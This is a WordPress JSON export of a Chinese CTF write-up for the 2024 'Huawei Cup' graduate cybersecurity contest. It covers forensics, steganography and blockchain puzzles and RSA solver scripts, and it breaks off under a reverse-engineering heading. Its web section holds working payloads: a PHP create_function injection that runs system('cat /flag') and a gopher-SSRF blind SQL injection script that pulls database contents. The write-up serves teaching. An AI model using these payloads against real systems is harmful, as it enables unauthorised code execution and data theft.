{"id":408,"date":"2024-10-10T21:55:10","date_gmt":"2024-10-10T13:55:10","guid":{"rendered":"http:\/\/www.s1mh0.cn\/blog\/?p=408"},"modified":"2024-10-17T13:23:57","modified_gmt":"2024-10-17T05:23:57","slug":"cpipc2024_wp","status":"publish","type":"post","link":"https:\/\/www.s1mh0.cn\/blog\/index.php\/2024\/10\/10\/cpipc2024_wp\/","title":{"rendered":"\u201c\u534e\u4e3a\u676f\u201d\u7b2c\u4e09\u5c4a\u4e2d\u56fd\u7814\u7a76\u751f\u7f51\u7edc\u5b89\u5168\u521b\u65b0\u5927\u8d5b- WriteUp by Vp0int"},"content":{"rendered":"

Misc<\/h2>\n

SeekThroughAllNetworks<\/h3>\n
This is a difficult task to find out which testchain the hash  [0x90790830c4c891747ad8fbf2043f0a605e506f912e784671c96d1e9a650840c7]   is on.<\/code><\/pre>\n
\u901a\u8fc7\u9898\u76ee\u63cf\u8ff0\uff0c\u5728google\u641c\u7d22\u5230\u4e0b\u9762\u7f51\u7ad9\u53ef\u4ee5\u6d4b\u8bd5\u8fde\u63a5<\/p>\n
https:\/\/goerli.ethplorer.io\/tx\/0x90790830c4c891747ad8fbf2043f0a605e506f912e784671c96d1e9a650840c7#pageTab=transfers<\/code><\/p>\n
\u5728inputdata\u770b\u5230\u5341\u516d\u8fdb\u5236\u6570\u636e<\/p>\n
\"img\" <\/p>\n
\u641c\u7d22\u53d1\u73b0\u53ef\u4ee5\u901a\u8fc7ipfs\u4e0b\u8f7d\u6587\u4ef6<\/p>\n
\"img\" <\/p>\n
https:\/\/ipfs.io\/ipfs\/bafkreigalwws5ohp74lthl4xu3towuh2ztcfklppm2fjl5svu77lbpxsqm<\/code>\uff0c\u4e0b\u8f7d\u540e\u547d\u540d\u6587\u4ef6\u4e3a.psd\uff0c\u6253\u5f00\u770b\u5230\u4e24\u4e2a\u56fe\u5c42\u6709\u4e8c\u7ef4\u7801<\/p>\n
\"img\" <\/p>\n
\u4e00\u4e2a\u662fflag\u524d\u534a\u6bb5base64\u6570\u636e\uff0c\u4e00\u4e2a\u662f\u540e\u534a\u6bb5\u660e\u6587<\/p>\n
\"img\" <\/p>\n
\"img\" <\/p>\n
DASCTF{0hY0u<\/em>@r3_A_C1eVer_De7ect1v3.}<\/p>\n
\u5e7f\u4e3a\u4eba\u77e5\u7684\u79d8\u5bc6<\/h3>\n
\u9898\u76ee\u63cf\u8ff0\u7684base64\u89e3\u5bc6\u540e\u5e94\u8be5\u662f\u63d0\u793a\u505a\u9898\u6b65\u9aa4\uff0c\u4f46\u662f\u8fd8\u662f\u5f88\u8ff7<\/p>\n
c3RyLT5oZXgtPmFjY291bnQtPm5vbmNlMQ==\n\u2193\u2193 base64\nstr->hex->account->nonce1<\/code><\/pre>\n
\u540e\u7eed\u6839\u636e\u7fa4\u516c\u544a\u6839\u636e\u63d0\u793a\u5c06\u79d8\u5bc6\u5417?\u85cf\u5728Goerli\u7f51\u7edc\u91cc.<\/code>\u8f6c\u5341\u516d\u8fdb\u5236\u5f97\u5230metamask\u8d26\u6237\u79c1\u94a5<\/p>\n
\"img\" <\/p>\n
\u9996\u5148\u901a\u8fc7\u79c1\u94a5\u5728metamask\u5bfc\u5165\u8d26\u6237<\/p>\n
\"img\" <\/p>\n
\u7136\u540e\u590d\u5236\u8d26\u6237\u540d\u79f0\uff0c\u5728https:\/\/goerli.etherscan.io\/\u4e2d\u641c\u7d22\u8be5\u8d26\u6237<\/p>\n
https:\/\/goerli.etherscan.io\/address\/0x34c5a8Cbe765454A43f515cFe94928d26c2fE186<\/code><\/p>\n
\"img\" <\/p>\n
\u70b9\u51fb\u6b64\u8d26\u6237\u4ea4\u6613\u60c5\u51b5<\/p>\n
call\u90a3\u91cc\u53d1\u73b0DAS\u5934\uff0c\u63a5\u7740\u5728inputdata\u770b\u5230flag<\/p>\n
\"img\" <\/p>\n
\"img\" <\/p>\n
DASCTF{NOb0dy_Kn0w5_B10ckch4In_b3t7er_Th@n_ME}<\/p>\n
Secret_Varied_Gif<\/h3>\n
\u5728Ctff.gif\u540e\u9762\u770b\u5230\u6709\u4e2azip\u6587\u4ef6\uff0cbinwalk\u4e4b\u540e\u5f97\u5230decode\u6587\u4ef6\uff0c\u95eegpt\u662fsvg\u6587\u4ef6\uff0c\u76f4\u63a5\u8ba9gpt\u5c06\u91cc\u9762\u5185\u5bb9\u8f6c\u6210html<\/p>\n
\"img\" <\/p>\n
\u5f97\u5230<\/p>\n
\"img\" <\/p>\n
\u4e00\u773c\u732a\u5708\u5bc6\u7801\uff0c\u8f6c\u6362\u5f97\u5230ACADESVC\uff0c\u4f46\u662f\u5c06\u5176\u4f5c\u4e3aflag.txt\u89e3\u538b\u5bc6\u7801\u8bd5\u4e86\u5927\u5c0f\u5199\u548c\u5404\u79cd\u987a\u5e8f\u90fd\u4e0d\u5bf9\uff08\u6bd4\u8d5b\u7ed3\u675f\u7fa4\u91cc\u8ba8\u8bba\u8bf4\u662f\u51fa\u9898\u4eba\u7684\u95ee\u9898\uff0c\u6211\uff1f\uff1f\uff1f\uff09\uff0c\u6700\u540e\u731c\u6d4b\u5c1d\u8bd5\u5c06\u540e\u4e24\u4f4d\u5b57\u6bcd\u5f53\u505a\u63a9\u7801+\u8f6c\u5c0f\u5199\u7206\u7834\u7ec8\u4e8e\u5f97\u5230\u5bc6\u7801acadesvg\uff0c\u89e3\u538b\u5f97\u5230flag<\/p>\n
\"img\" <\/p>\n
DASCTF{e9e950d7d56d7987866242e13d2e27e7}<\/p>\n
Draw_what_you_like\uff08\u590d\u73b0\uff09<\/h3>\n
\u9898\u76ee\u7ed9\u4e86\u4e2a\u5185\u5b58\u955c\u50cf\u6587\u4ef6\u548c\u4e00\u4e2a\u538b\u7f29\u5305\uff0c\u4f46\u662f\u770b\u5341\u516d\u8fdb\u5236\u5e76\u4e0d\u662f\u538b\u7f29\u5305\u6587\u4ef6\uff0c\u5927\u5c0f\u4e3a1024\u7684\u6574\u6570\u500d\uff0c\u731c\u6d4b\u662f\u78c1\u76d8\u6587\u4ef6<\/p>\n
\u7528RS\u5148\u626b\u4e00\u904d\u5185\u5b58\uff0c\u5728kotori\u7528\u6237\u7684\u684c\u9762\u4e0b\u770b\u5230\u597d\u51e0\u4e2a\u53ef\u7591\u6587\u4ef6<\/p>\n
\"\"<\/p>\n
\u518d\u4e0avolatility\u5c06\u6587\u4ef6\u90fddump\u4e0b\u6765(\u9664\u4e86dumpit.exe)\uff0c\u9996\u5148flag.txt\u5f97\u5230flag1\uff1aflag01:{forensics_<\/code><\/p>\n
draw.zip\u9700\u8981\u5bc6\u7801<\/p>\n
flag2.zip\u6709\u4e2aplaces.sqlite\u6587\u4ef6\uff0c\u6253\u5f00\u6570\u636e\u5e93\u5728places\u8868\u91cc\u770b\u5230\u4e2apasswordDigital5211314<\/code>\uff0c\u4e3adraw\u538b\u7f29\u5305\u7684\u89e3\u538b\u5bc6\u7801<\/p>\n
\"\"<\/p>\n
\u6253\u5f00\u6d41\u91cf\u5305\u4e3ausb\u6d41\u91cf\uff0c\u63a5\u7740\u76f4\u63a5\u770bHID data\uff0c\u5e76\u975e\u9f20\u6807\u6d41\u91cf\u4e5f\u5e76\u975e\u952e\u76d8\u6d41\u91cf\uff0c\u4e3b\u673a\u662f\u4e0e2.5.2\u8bbe\u5907\u901a\u8baf\uff0c\u56e0\u6b64\u57282.5.0\u7684GET descriptor response device\u53ef\u4ee5\u770b\u5230\u8bbe\u5907\u540d\u662fXP-Pen\uff0c\u5373\u6570\u4f4d\u677f<\/p>\n
\"\"<\/p>\n
\u5728HID\u7528\u9014\u8868\u4e2d\u67e5\u770b\u6570\u4f4d\u677f\u5bf9\u5e94\u6837\u4f8b<\/p>\n
\"\"<\/p>\n
07a1833ea4672e16160c\n07a1833ea467c012150c\n07a17a3eb0679b0f150c\n07a17a3eb0674f0d150c\n07a1783e9f678c06150c\n07a07c3e77670000140d\n07a0833e3f670000130c\n07a08e3ef9660000130b\n07a0a73e70660000120b\n07a0c43edc650000110b\n07a0e73e3e650000100b\n07a00d3f9d6400000f0b<\/code><\/pre>\n
\u5bf9\u6bd4HID Data\u6bd4\u8f83\u7b26\u5408\u8be5\u683c\u5f0f\uff0c5-8\u4f4d\u5c0f\u7aef\u5e8f\u5b58\u50a8x\u8f74\uff0c9-12\u4f4d\u5c0f\u7aef\u5e8f\u5b58\u50a8y\u8f74\uff1b\u6b64\u5916\u53ef\u4ee5\u901a\u8fc715-16\u4f4d\u662f\u5426\u4e3a\u201c00\u201d\uff0c\u6216\u8005\u901a\u8fc71-4\u4f4d\u662f\u5426\u4e3a\u201c07a1\u201d\u5224\u65ad\u6309\u538b\u60c5\u51b5<\/p>\n
import matplotlib.pyplot as plt\ndata=[]\nwith open('data2.txt',"r") as f:\n    for line in f.readlines():\n        # if line[16:18] != "00":   # filter\n        # if line[0:4] == "07a1":\n        if line[14:16] != "00":\n            data.append(line)\nX = []\nY = []\nfor line in data:\n        x0 = int(line[4:6], 16)\n        x1 = int(line[6:8], 16)\n        x = x0 + x1 * 256\n\n        y0 = int(line[8:10], 16)\n        y1 = int(line[10:12], 16)\n        y = y0 + y1 * 256\n\n        X.append(x)\n        Y.append(-y)\n\nplt.scatter(X, Y, c="black")\nplt.show()<\/code><\/pre>\n
\u5f97\u5230flag2\uff1aMISC_DRAW_<\/code><\/p>\n
\"\"<\/p>\n
\u6700\u540e\u4e00\u4e2aflag\u5e94\u8be5\u5c31\u5728\u8fd8\u6ca1\u7528\u4e0a\u7684\u78c1\u76d8\u6587\u4ef6\u91cc\u4e86\uff0c\u7528EFDD\u53ef\u4ee5\u68c0\u6d4b\u51fa\u7528\u4e86TrueCrypt\u6216\u8005VeraCrypt\u52a0\u5bc6\uff0c\u73b0\u5728\u8fd8\u7f3a\u5bc6\u94a5key<\/p>\n
\"\"<\/p>\n
\u6839\u636ehint.txt\u4e2dkey\u8fdc\u5728\u5929\u8fb9\u8fd1\u5728\u773c\u524d<\/code>\u7684\u62bd\u8c61\u63d0\u793a\u548c\u8fd8\u6ca1\u7528\u5230\u7684jpg\u56fe\u7247\uff0c\u6700\u540e\u5728vera\u7528jpg\u4f5c\u4e3akey\u6302\u8f7dsecret\u6587\u4ef6\uff0c\u5f97\u5230flag3\uff1aVerakey_graph}<\/code><\/p>\n
\"\"<\/p>\n
\"\"<\/p>\n
\u62fc\u63a5\u5f97\u5230flag\uff1aflag{forensics_MISC_DRAW_Verakey_graph}<\/p>\n
Web<\/h2>\n
very_easyphp<\/h3>\n
\u8fdb\u53bb\u8bbf\u95ee\u6e90\u7801<\/p>\n
<?php\nhighlight_file(__FILE__);\nerror_reporting(0);\n$data = parse_url($_SERVER['REQUEST_URI']);\n$han = basename($data['query']);\n$a = $_GET['a'];\n$b = $_GET['b'];\nif (!preg_match('\/[a-z0-9_]\/i', $han)) {\n\n    if (is_string($a) && is_numeric($b)) {\n        if ($a != $b && md5($a) == md5($b)) {\n            $week1 = true;\n        } else {\n            echo "\u4f60\u884c\u4e0d\u884c\uff0c\u7ec6\u72d7;<br \/>";\n        }\n    } else {\n\n        echo "\u4e0d\u8981\u800d\u5c0f\u806a\u660e\u54e6<br \/>";\n    }\n} else {\n\n    echo "\u8fd9\u4e9b\u90fd\u88ab\u8fc7\u6ee4\u4e86\u54e6<br \/>";\n}\n\nif (!isset($time)) {\n    $time = gmmktime();\n}\n$b = substr($time, 0, 7);\nmt_srand($b);\necho "hint:" . (mt_rand()) . "<br \/>";\nfor ($i = 0; $i <= 100; $i++) {\n\n    if ($i == 100) {\n        $sui = mt_rand();\n    } else {\n        mt_rand();\n    }\n}\n\nif ($_POST['c'] == $sui) {\n    $d = $_POST['d'];\n    if (intval('$d') < 4 && intval($d) > 10000) {\n        $week2 = true;\n        echo "\u4e0d\u9519\u54e6,\u5feb\u53bb\u83b7\u5f97flag\u5427<br \/>";\n    } else {\n        echo "\u597d\u50cf\u4e0d\u7b26\u5408\u8981\u6c42\u54e6\uff0c\u518d\u60f3\u60f3\u5427<br \/>";\n    }\n} else {\n    echo "\u518d\u597d\u597d\u60f3\u4e00\u60f3\u54e6<br \/>";\n}\n\nif ($week1 && $week2) {\n    $f = $_POST['flag'];\n    $e = $_POST['e'];\n    if (!preg_replace('\/[a-z0-9_]\/isD', '', $_POST['flag'])) {\n        echo "\u8fd9\u6837\u53ef\u4e0d\u592a\u597d\u54e6<br \/>";\n    } else {\n        $f('', $e);\n    }\n} else {\n    echo "\u80d6\u864e\uff0c\u4f60\u5728\u641e\u4ec0\u4e48.<br \/>";\n}<\/code><\/pre>\n
\u7ed5\u8fc7parse_url\uff1a\/\/\/<\/p>\n
\u7ed5\u8fc7md5\u5f31\u6bd4\u8f83\uff1aa=QNKCDZO&b=240610708<\/p>\n
php\u56fa\u5b9a\u79cd\u5b50\u4f2a\u968f\u673a\u6570\uff0c\u811a\u672c\uff1a<\/p>\n
<?php\nif (!isset($time)) {\n  $time = gmmktime();\n}\n$b = substr($time, 0, 7);\nmt_srand($b);\necho "hint:" . (mt_rand()) . "<br \/>";\nfor ($i = 0; $i <= 100; $i++) {\n\n  if ($i == 100) {\n    $sui = mt_rand();\n  } else {\n    mt_rand();\n  }\n}\necho $sui;\n?><\/code><\/pre>\n
intval\u622a\u65ad\u7ed5\u8fc7\uff1a10001.1<\/p>\n
\/^[a-z0-9_]*$\/isD\u7684\u610f\u601d\uff1a<\/p>\n
\/i\u4e0d\u533a\u5206\u5927\u5c0f\u5199\n\n\/s\u5339\u914d\u4efb\u4f55\u4e0d\u53ef\u89c1\u5b57\u7b26\uff0c\u5305\u62ec\u7a7a\u683c\u3001\u5236\u8868\u7b26\u3001\u6362\u9875\u7b26\u7b49\u7b49\uff0c\u7b49\u4ef7\u4e8e[fnrtv]\n\n\/D\u5982\u679c\u4f7f\u7528$\u9650\u5236\u7ed3\u5c3e\u5b57\u7b26,\u5219\u4e0d\u5141\u8bb8\u7ed3\u5c3e\u6709\u6362\u884c;<\/code><\/pre>\n
\u6b63\u5219\u5339\u914d\u7684\u662f\u6570\u5b57\uff0c\u5b57\u6bcd\uff0c\u4e0b\u5212\u7ebf\u5f00\u5934\u7684\u503c\uff0c\u6211\u4eec\u9700\u8981\u627e\u5230\u4e00\u4e2a\u4e0d\u4ee5\u6570\u5b57\uff0c\u5b57\u6bcd\uff0c\u4e0b\u5212\u7ebf\u5f00\u5934\u7684value\uff0c\u540c\u65f6\u53ef\u4ee5\u6b63\u5e38\u6267\u884c\u51fd\u6570\uff0c\u7528\\<\/code>\u7ed5\u8fc7<\/p>\n
flag=\\create_function&e=return%222333%22;}system('cat \/flag);\/*<\/code><\/p>\n
\"img\" <\/p>\n
ssssrf<\/h3>\n
ssrf\u80fd\u8bfb\u6e90\u7801\uff1a<\/p>\n
<?php\n\/**\n * Database mysql\n *\/\nerror_reporting(0);\n$flag=getenv("FLAG");\n\n$db_host = "127.0.0.1";\n$db_user = "root";\n$db_pass = "root";\n$db_name = "ctf";\n$conn = mysqli_connect($db_host, $db_user, $db_pass, $db_name);\nif (!$conn) {\n    die("connect error: " . mysqli_connect_error());\n}\n\nif($_SERVER['REMOTE_ADDR']=='127.0.0.1'){\n\nif (isset($_POST["id"])) {\n    $id     = $_POST['id'];\n    $sql    = "select * from users where id='$id'";\n    $result = mysqli_query($conn, $sql);\n    if($result) {\n        $res  = mysqli_fetch_array($result);\n        if ($res){\n            $err = FALSE;\n        } else {\n            $err = TRUE;\n        }\n        $err_msg = "";\n    } else {\n        $err = TRUE;\n        $err_msg = mysqli_error($conn);\n    }\n}\nmysqli_close($conn);\nif(isset($_POST["id"])){\n    echo $sql;\n    if($err) {\n        echo "error";\n    } else {\n        echo "success";\n    }\n}\nelse{\n    die('\u8bf7\u8f93\u5165\u641c\u7d22\u7684id\u503c');\n}\n}\nelse{\n    die('\u975e\u672c\u5730\u7528\u6237\uff0c\u7981\u6b62\u8bbf\u95ee');\n}\n?><\/code><\/pre>\n
\u770b\u5230\u4f20\u53c2id\u4ee3\u5165sql\u67e5\u8be2\u3002\u68c0\u6d4b\u662f\u5426\u6709sql\u6ce8\u5165\uff1a<\/p>\n
import urllib.parse \n\nid = "-1' or '1'='1--" \nlength = len(id) + 6 \npayload = \\ \n"""POST \/flag.php HTTP\/1.1 \nHost:127.0.0.1:80 \nContent-Length:""" + str(length) + """ \nContent-Type:application\/x-www-form-urlencoded \n\nid=""" + id \nprint(payload) \n# \u6ce8\u610f\u540e\u9762\u4e00\u5b9a\u8981\u6709\u56de\u8f66\uff0c\u56de\u8f66\u7ed3\u5c3e\u8868\u793ahttp\u8bf7\u6c42\u7ed3\u675f\ntmp = urllib.parse.quote(payload) \nnew = tmp.replace('%0A', '%0D%0A') \nresult = 'gopher:\/\/127.0.0.1:80\/' + '_' + new \nresult = urllib.parse.quote(result)  # get\u8bf7\u6c42\nencoded_url = result.replace('\/', '%2F') \nprint(encoded_url)<\/code><\/pre>\n
\u62a5error\u4e86\uff0c\u80fd\u89e3\u6790\u3002gopher\u534f\u8bae\u4f20POST\u8fdb\u884csql\u6ce8\u5165\uff0cPOC\uff1a<\/p>\n
import datetime\nimport requests\nimport urllib.parse\n\ndef generate_paylaod(payload):\n    test = \\\n        """POST \/flag.php HTTP\/1.1\nContent-Length: {}\nHost: 127.0.0.1:80\nContent-Type: application\/x-www-form-urlencoded\n\n{}\n\n""".format(len(payload), payload)\n    tmp = urllib.parse.quote(test)\n    new = tmp.replace('%0A', '%0D%0A')\n    result = 'gopher:\/\/127.0.0.1:80\/' + '_' + new\n    result = urllib.parse.quote(result)\n    return result\n\nurl = 'http:\/\/192.168.18.25\/'\n\ndef getdbname():\n    name = ""\n    for j in range(1, 10):\n        for i in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_":\n            payload = "id=1' and if(ascii(substr(database(),%d,1))=%s,sleep(10),1) #" % (j, ord(i))\n            print(payload)\n            time1 = datetime.datetime.now()\n            payload = generate_paylaod(payload)\n            payload = "url="+payload\n            headers = {\n                "Content-Type": "application\/x-www-form-urlencoded"\n            }\n            proxy = {\n                'http':'127.0.0.1:8081'\n            }\n            requests.post(url, data=payload,headers=headers)\n            time2 = datetime.datetime.now()\n            cha = (time2 - time1).seconds\n            if cha >= 10:\n                name += i\n                print(name)\n                break\n        print("information_name:", name, "\\n")\n\ndef information_name():\n    name=""\n    for k in range(0, 5):\n        for j in range(1,10):\n            for i in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_':\n                payload="id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='ctf' limit %d,1),%d,1))=%d,sleep(10),0) --+"  % (k, j, ord(i))\n                print(payload)\n                time1 = datetime.datetime.now()\n                payload = generate_paylaod(payload)\n                payload = "url=" + payload\n                headers = {\n                    "Content-Type": "application\/x-www-form-urlencoded"\n                }\n                proxy = {\n                    'http': '127.0.0.1:8081'\n                }\n                requests.post(url, data=payload, headers=headers)\n                time2 = datetime.datetime.now()\n                cha = (time2 - time1).seconds\n                if cha >= 10:\n                    name += i\n                    print(name)\n                    break\n        print("information_name",name,"\\n")\n        name = ""\n\ndef columns_name():\n    name=""\n    for k in range(0,5):\n        for j in range(5,10):\n            for i in 'abcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZ':\n                payload="id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='flag_tttt' and table_schema=database() limit %d,1),%d,1))=%d,sleep(10),0) --+" % (k,j,ord(i))\n                print(payload)\n                time1 = datetime.datetime.now()\n                payload = generate_paylaod(payload)\n                payload = "url=" + payload\n                headers = {\n                    "Content-Type": "application\/x-www-form-urlencoded"\n                }\n                proxy = {\n                    'http': '127.0.0.1:8081'\n                }\n                requests.post(url, data=payload, headers=headers)\n                time2 = datetime.datetime.now()\n                cha = (time2 - time1).seconds\n                if cha >= 10:\n                    name += i\n                    print(name)\n                    break\n        print("columns_name", name, "\\n")\n        name = ""\ndef columns_value():\n    name=""\n    for k in range(0,5):\n        for j in range(1,50):\n            for i in "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-_":\n                payload ="id=1' and if(ascii(substr((select flag_cccc from flag_tttt limit %d,1),%d,1))=%d, sleep(10),0)--+" % (k,j,ord(i))\n                print(payload)\n                time1 = datetime.datetime.now()\n                payload = generate_paylaod(payload)\n                payload = "url=" + payload\n                headers = {\n                    "Content-Type": "application\/x-www-form-urlencoded"\n                }\n                proxy = {\n                    'http': '127.0.0.1:8081'\n                }\n                requests.post(url, data=payload, headers=headers)\n                time2 = datetime.datetime.now()\n                cha = (time2 - time1).seconds\n                if cha >= 10:\n                    name += i\n                    print(name)\n                    break\n\n        print("columns_value",name,"\\n")\n        name=""\n\nif __name__ == '__main__':\n    columns_value()<\/code><\/pre>\n
\"img\" <\/p>\n
\u6700\u540e\u5fd8\u8bb0\u622a\u56fe+\u76f2\u6ce8\u65f6\u95f4\u8fc7\u957f\uff0c\u6bd4\u8d5b\u7ed3\u675f\u524d\u518d\u8dd1\u4e00\u904d\u6765\u4e0d\u53ca\uff0c\u6700\u540eflag\u4e3a<\/p>\n
flag\uff1af23c69ffdec24ceeb2204c6d25e59212<\/p>\n
Crypto<\/h2>\n
EZ_RSA_5<\/h3>\n
\u7ed9\u4e86p\u5173\u4e8eq\u7684\u9006\u5143\u548cq\u5173\u4e8ep\u7684\u9006\u5143\uff0c\u53ef\u4ee5\u6c42p\u548cq\uff0c\u63a5\u7740\u662f\u4e00\u4e2adp\u6cc4\u9732\uff0c\u6c42\u51faP\u540e\u5f97\u5230flag<\/p>\n
from Crypto.Util.number import *\n\ndef gcd(a, b):\n  while(b): \n    a,b = b, a % b \n  return a \n\ndef mysqrt(d):\n  st = 1\n  en = 10**1300\n  while st<=en:\n    mid = (st+en)\/\/2\n    if mid*mid == d: return mid\n    if mid*mid < d: st=mid+1\n    else: en=mid-1\n  return -1\n\ndef egcd(a1, a2):\n    x1, x2 = 1, 0\n    y1, y2 = 0, 1\n    while a2:\n        q = a1 \/\/ a2\n        a1, a2 = a2, a1 - q * a2\n        x1, x2 = x2, x1 - q * x2\n        y1, y2 = y2, y1 - q * y2\n    return (x1, y1, a1)\n\nipmq= 2636020992576559969055483957060200941734026828135579110378070592732862908176025649071069827089999996350015210043636523971348821850565913816154887832272305\niqmp= 7886513101716991094728039196608717849158915101115291363845210343608904418304571443491051842715241903123031976527174063528298034452215971449949398656913945\nphi= 115505961171763309547793530782914001823768056515083869218337105172209622283311582473506324170565971054492347897941697574972266679462737991988159654350224823122310342866537098903019067348499259894857405865405379172014292034138593409888061494667098647947191077373457924105640280156013690526621147715122416478264\ne = 65537\n\nd = inverse(e,phi)\ngg = gcd(iqmp-1,ipmq-1)\n\nc = phi \/\/ gg\na = (ipmq-1)\/\/gg\nb = (iqmp-1)\/\/gg\n# p*a + q*b = c\npmod = inverse(a, b)*c%b\nfor j in range(100000):\n    p = pmod + j*b\n    if p > (1<<1024): break\n    if not isPrime(p): continue\n    q = (c-p*a)\/\/b\n    assert(p*a+q*b==c)\n    if (iqmp*q-1)%p == 0 and (ipmq*p-1)%q == 0:\n        break\n# print(p)\n# print(q)\n\nn = p*q\nK =  3995906172915513953882445609459153360257793100017419734812726991957587919349807133880917342081892953635338598486012480314014321088548439223094566668968735207492741920107799674089668131177188073985125603237341660194741854181484934968528811686828555591685803851909027192343245722679639249600176791158349393704697742640442010893811830528349203606514981272974154582682489532205008927740716725904614810707240205595586894383039181983075907373556864396176123489201513001026708388504250801785422323131912494763394371589512367935031912074535458595633402462463667072692589863355712935552396330534658448628449816139943205511637\ndp =  53589538487289875479012684116246778147274714450209576105277816626983528993595125486641833027290704077932308918237978477501981907543847383655230156916578979044682282870153618849419762148348930652564442177633668690473147864322377146889467662769284463217004314651469157455678363085510100707437896627192687923547\n\ndd = inverse(p,phi)\nfor i in range(1,e):                   \n    if(dp*e-1)%i == 0:\n        if K%(((dp*e-1)\/\/i)+1) == 0:   \n            c=((dp*e-1)\/\/i)+1\n            # print(c)\n            m = pow(c,dd,n)\n            print(long_to_bytes(m))\n\n# b'DASCTF{this_1s_crazy_Rsa}'<\/code><\/pre>\n
\"img\" <\/p>\n
DASCTF{this_1s_crazy_Rsa}<\/p>\n
real_rsa_2<\/h3>\n
https:\/\/connor-mccartney.github.io\/cryptography\/other\/apbq-rsa-ii-DUCTF-2023<\/a><\/p>\n
\u539f\u9898\uff0c\u53ea\u9700\u628an, c, h1,h2,h3\u66ff\u6362\u7136\u540esagemath\u8dd1\u5373\u53ef<\/p>\n
\"img\" <\/p>\n
\"img\" <\/p>\n
DASCTF{0rtho_l4tt1c3_1s_fun_and_gr34t}<\/p>\n
insecure_padding<\/h3>\n
Coppersmith\u7b97\u6cd5\u89e3\u51b3RSA<\/p>\n
\u77e5\u8bc6\u70b9\u6765\u81ea\uff1a<\/p>\n
https:\/\/xz.aliyun.com\/t\/13769?time__1311=GqmxuQi%3DDQiQ%3DGXPjxUhQDnDjhHfODgioD<\/a><\/p>\n
\"img\" <\/p>\n
\u8fd9\u91cc\u7684\u653b\u51fb\u5c5e\u4e8e\u4f4e\u4f4d\u653b\u51fb\u3002\u5df2\u77e5m\u7684\u4e00\u90e8\u5206\u4fe1\u606f\uff0c\u4f4elen\u4f4d\u5df2\u77e5<\/p>\n
\u5047\u8bbe\u660e\u6587 ( m ) \u53ef\u4ee5\u8868\u793a\u4e3a\uff1a m = k \\cdot 2^{l \\cdot 8} + m_0<\/code><\/p>\n
\u6784\u9020\u4e00\u4e2a\u591a\u9879\u5f0f f(x) \u6765\u8868\u793a\u4e0a\u8ff0\u5173\u7cfb\uff1a <\/p>\n
[ f(x) = (x \\cdot 2^{l} + m_0)^e - c ]<\/code><\/p>\n
\u901a\u8fc7 Coppersmith \u65b9\u6cd5\uff0c\u6211\u4eec\u53ef\u4ee5\u5bfb\u627e\u591a\u9879\u5f0f ( f(x) ) \u5728\u6a21 ( n ) \u4e0b\u7684\u5c0f\u6839\uff0c\u8fd9\u4e9b\u5c0f\u6839\u5c31\u662f\u53ef\u80fd\u7684 ( k ) \u503c<\/p>\n
c\u662f\u5bc6\u6587\uff0cn\u662f\u6a21\u6570\uff0clen\u662f\u5df2\u77e5\u7684\u90e8\u5206\u4fe1\u606f\u7684\u957f\u5ea6<\/p>\n
\u521b\u5efa\u4e00\u4e2a\u591a\u9879\u5f0f\u73afP\uff0cx\u4f5c\u4e3a\u53d8\u91cf<\/p>\n
P.<x>=PolynomialRing(Zmod(n))<\/code><\/p>\n
\u628a\u53d8\u91cfx\u8f6c\u4e3a\u4e8c\u8fdb\u5236\uff0c\u56e0\u4e3a\u4e00\u5b57\u8282\u4e3a8bit\uff0c\u6240\u4ee5len*8\uff0c\u7b49\u5f0ff\u7684\u6784\u9020\u4e5f\u5c31\u662f\u8fd8\u539fpad<\/p>\n
\"img\" <\/p>\n
\u6839\u636epad\u548cflag\u7684\u957f\u5ea6\uff0c\u5f97\u5230X=2^160<\/code><\/p>\n
\u641c\u7d22\u8303\u56f4\u5df2\u77e5\uff0c\u56e0\u4e3a\u53ea\u6709beta\u548cepsilon\u53c2\u6570\u53ef\u63a7\uff0c\u76f4\u63a5\u6b65\u957f0.01\u7206\u7834<\/p>\n
from Crypto.Util.number import * \nc, e, n, l1=(1193333119181381225632504634109476125461718042032463066180160159530821008151288619914035008577444580123023483451618973104785206841878926362053767758825420307104536873166791566346076985369125399199847240472385775854381103486198612767122009780041785220241663307760491699892303259600093817957324293717178123893664313547870460181936283477289029428950611459484805364390503487619676794166358047636359524103138509752217552291498141048509236471615548177017684230320627457, 3, 1345974903151028106176188777499919289689885052993818155551239513162986365479059645712347472719763678799888312063629534224676532524320490059299999431455806985776161385636341889882617880557005343019148419971407438285456200388681742721058826527478752200546957229924712840178042652788689761602760552457535667154424045780264689394678280189407534443469304768432295723527834457536647823320807747766083091825227699222804959851169910812454526260545186908048603618547346519, 130) \nP.<x>=PolynomialRing(Zmod(n)) \nf=(x*2^(l1*8)+666)^3-c \nfor i in np.arange(0, 1.01, 0.01): \n  for j in np.arange(0, 1.01, 0.01): \n        root=f.monic().small_roots(X=2^160,beta=i,epsilon=j) \n        print(root) \n        for x in root: \n        print(long_to_bytes(int(x)))<\/code><\/pre>\n
\u5b9e\u9645\u4e0a\u6c42\u51fa\u7684\u53c2\u6570\u5982\u4e0b\uff1a<\/p>\n
\"img\" <\/p>\n
\u5df2\u77e5c ,e ,n ,l1<\/p>\n
from Crypto.Util.number import * \nc, e, n, l1=(1193333119181381225632504634109476125461718042032463066180160159530821008151288619914035008577444580123023483451618973104785206841878926362053767758825420307104536873166791566346076985369125399199847240472385775854381103486198612767122009780041785220241663307760491699892303259600093817957324293717178123893664313547870460181936283477289029428950611459484805364390503487619676794166358047636359524103138509752217552291498141048509236471615548177017684230320627457, 3, 1345974903151028106176188777499919289689885052993818155551239513162986365479059645712347472719763678799888312063629534224676532524320490059299999431455806985776161385636341889882617880557005343019148419971407438285456200388681742721058826527478752200546957229924712840178042652788689761602760552457535667154424045780264689394678280189407534443469304768432295723527834457536647823320807747766083091825227699222804959851169910812454526260545186908048603618547346519, 130) \nP.<x>=PolynomialRing(Zmod(n)) \nf=(x*2^(l1*8)+666)^3-c \nroot=f.monic().small_roots(X=2^160,beta=0.64,epsilon=0.03) \nprint(root) \nfor x in root: \n  print(long_to_bytes(int(x)))\n\n# b'P@dding_1s_important'<\/code><\/pre>\n
flag\uff1aP@dding_1s_important<\/p>\n
reverse<\/h2>\n
ezhtml<\/h3>\n
\u6587\u4ef6<\/p>\n